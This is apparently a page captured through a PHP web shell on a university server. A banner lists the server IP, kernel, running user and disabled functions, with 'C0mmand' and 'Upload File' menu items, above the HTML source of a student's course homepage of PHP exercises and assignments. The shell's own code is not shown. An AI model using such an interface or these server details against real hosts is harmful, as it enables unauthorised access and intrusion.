Server IP : 172.16.15.8 / Your IP : 3.142.212.119 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/tmhoward/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> <style> body { font-family: Arial, Helvetica, sans-serif; } .navbar { overflow: hidden; background-color: #333; } .navbar a { float: left; font-size: 16px; color: white; text-align: center; padding: 14px 16px; text-decoration: none; } .dropdown { float: left; overflow: hidden; } .dropdown .dropbtn { font-size: 16px; border: none; outline: none; color: white; padding: 14px 16px; background-color: inherit; font-family: inherit; margin: 0; } .navbar a:hover, .dropdown:hover .dropbtn { background-color: red; } .dropdown-content { display: none; position: absolute; background-color: #f9f9f9; min-width: 160px; box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2); z-index: 1; } .dropdown-content a { float: none; color: black; padding: 12px 16px; text-decoration: none; display: block; text-align: left; } .dropdown-content a:hover { background-color: #ddd; } .dropdown:hover .dropdown-content { display: block; } </style> </head> <body> <div class="navbar"> <a href="#news">Tyson Howard</a> <div class="dropdown"> <button class="dropbtn">Exercises <i class="fa fa-caret-down"></i> </button> <div class="dropdown-content"> <A HREF=first.php>My First PHP</a> <A HREF=second.php>My Second PHP</a> <A HREF=greeting1.php>Greetings!!</a> <A HREF=areaOfCircle.php>Area of Circle</a> <A HREF=hello.html>Greeting Form</a> <A HREF=LinearEqu.html>Linear Equation</a> <A HREF=surveyForm.php>Survey Form</a> <A HREF=birthYear.php>Birth Year</a> <A HREF=display.php>Display Table</a> <A HREF=extra.html>Display Table</a> </div> </div> <div class="dropdown"> <button class="dropbtn">Assignment 1 <i class="fa fa-caret-down"></i> </button> <div class="dropdown-content"> <A HREF=Assignment1.html> Assignment 1</a> <A HREF=Assignment1b.html> Assignment 1b</a> <A HREF=Assignment1c.html> Assignment 1c</a> </div> </div> <div class="dropdown"> <button class="dropbtn">Assignment 2 <i class="fa fa-caret-down"></i> </button> <div class="dropdown-content"> <A HREF=Assignment2.html> Assignment 2</a> <A HREF=Assignment2b.html> Assignment 2b</a> <A HREF=Assignment2c.html> Assignment 2c</a> </div> </div> <div class="dropdown"> <button class="dropbtn">Assignment 3 <i class="fa fa-caret-down"></i> </button> <div class="dropdown-content"> <A HREF=Assignment3.php> Assignment 3</a> <A HREF=Assignment3b.html> Assignment 3b</a> </div> </div> <div class="dropdown"> <button class="dropbtn">Assignment 4 <i class="fa fa-caret-down"></i> </button> <div class="dropdown-content"> <A HREF=Asg4_index.html> Assignment 4</a> </div> </div> <div class="dropdown"> <button class="dropbtn">Assignment 5 <i class="fa fa-caret-down"></i> </button> <div class="dropdown-content"> <A HREF=Assignment5.html> Assignment 5</a> </div> </div> <div class="dropdown"> <button class="dropbtn">Final Project <i class="fa fa-caret-down"></i> </button> <div class="dropdown-content"> <!-- <A HREF=FinalProject.html> Final Project</a>--> <!-- <A HREF=FinalProject1.html> FP1</a>--> <A HREF=FinalProject3.html> Final Project</a> </div> </div> <div class="dropdown"> <button class="dropbtn">Senior Project <i class="fa fa-caret-down"></i> </button> <div class="dropdown-content"> <!--<A HREF="menu/index.html"> Senior Project</a>--> <!--<A HREF=Practice2.html> Practice2</a>--> <!--<A HREF="admin/index.html"> Admin</a>--> <!--<A HREF="gray/index.html"> Practice5</a>--> <!--<A HREF="social/index.php"> Test</a>--> <A HREF="port/index1.html"> Senior Project</a> <!--<A HREF="social/index.php"> Practice4</a>--> </div> </div> </div> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- <style> body { margin: 0; } .hero-image { background-image: url("https://i.pinimg.com/originals/f2/ae/e8/f2aee825e2c34b727276852d93734e1d.jpg"); background-color: #cccccc; height: 700px; background-position: center center; background-repeat: no repeat; background-size: cover; background-attachment: fixed; position: relative; } </style> --> <style> * { margin: 0; padding: 0; } html { background: url(https://i.pinimg.com/originals/f2/ae/e8/f2aee825e2c34b727276852d93734e1d.jpg) no-repeat center center fixed; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover; } #page-wrap { width: 400px; margin: 50px auto; padding: 20px; background: white; -moz-box-shadow: 0 0 20px black; -webkit-box-shadow: 0 0 20px black; box-shadow: 0 0 20px black; } p { font: 15px/2 Georgia, Serif; margin: 0 0 30px 0; text-indent: 40px; } </style> </head> <body> <div class="hero-image"> <div class="hero-text"> </div> </div> </body> </body> </html>